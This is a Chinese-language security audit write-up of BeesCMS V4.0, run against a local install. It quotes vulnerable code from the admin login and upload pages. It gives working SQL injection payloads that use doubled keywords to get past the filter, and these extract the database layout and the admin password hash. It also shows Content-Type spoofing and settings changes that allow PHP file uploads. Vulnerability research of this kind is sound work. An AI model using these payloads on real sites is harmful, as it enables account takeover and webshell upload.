Beescms V4.0审计

发表于 更新于 分类于

beescms

前台管理登录界面注入

http://127.0.0.1/beescms/admin/login.php

1
2
3
4
function fl_html($str){
	return htmlspecialchars($str);
}
htmlspecialchars()默认仅编码双引号
1
2
3
4
5
function fl_value($str){
	if(empty($str)){return;}
	return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/i','',$str);
}
1
2
$user=fl_html(fl_value($_POST['user']));
$rel=$GLOBALS['mysql']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");

//爆破库名

1
admin'and extractvalue(1,concat(0x7e,select database(),0x7e))#

//利用双写+空格绕过过滤
//爆破表名

1
admin' a and nd extractvalue(1,concat(0x7e,(selselectect table_name fr from om information_schema.tables wh where ere table_schema like 'beescms' limit 0,1),0x7e))#

//爆破列名

1
admin' a and nd extractvalue(1,concat(0x7e,(selselectect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 0,1),0x7e))#

//爆破admin账户名:admin

1
admin' a and nd extractvalue(1,concat(0x7e,(selselectect admin_name fr from om beescms.bees_admin limit 0,1),0x7e))#

//结合substr全部爆破密码

1
admin' a and nd extractvalue(1,concat(0x7e,substr((selselectect admin_password fr from om beescms.bees_admin limit 0,1),3,32),0x7e))#

//21232f297a57a5a743894a0e4a801fc3很明显的md5函数处理:admin

后台文件上传1

mime类型绕过
http://127.0.0.1/beescms/admin/admin_pic_upload.php

1
2
3
4
5
6
7
8
$value_arr=up_img($pic_info,$is_up_size,array('image/gif','image/jpeg','image/png','image/jpg','image/bmp','image/pjpeg','image/x-png'),$up_is_thumb,$up_thumb_width,$up_thumb_height,$logo=1,$pic_name_alt);

function  up_img($file,$size,$type,$thumb=0,$thumb_width='',$thumb_height='',$logo=1,$pic_alt=''){
	$file_type=$file['type'];
	if(!in_array(strtolower($file_type),$type)){
		msg('上传图片格式不正确');
	}
}

只对Content-Type: 进行了对比
所以修改Content-Type: 即可进行文件上传绕过
Content-Disposition: form-data; name=”up[]”; filename=”1.php”
Content-Type: image/png

后台文件上传2

同样是mime类型绕过
up_img()函数
http://127.0.0.1/beescms/admin/upload.php

后台文件上传3

http://127.0.0.1/beescms/admin/admin_sys.php
修改允许上传文件类型
添加一个php类型
然后
http://127.0.0.1/beescms/admin/admin_file_upload.php
即可上传php文件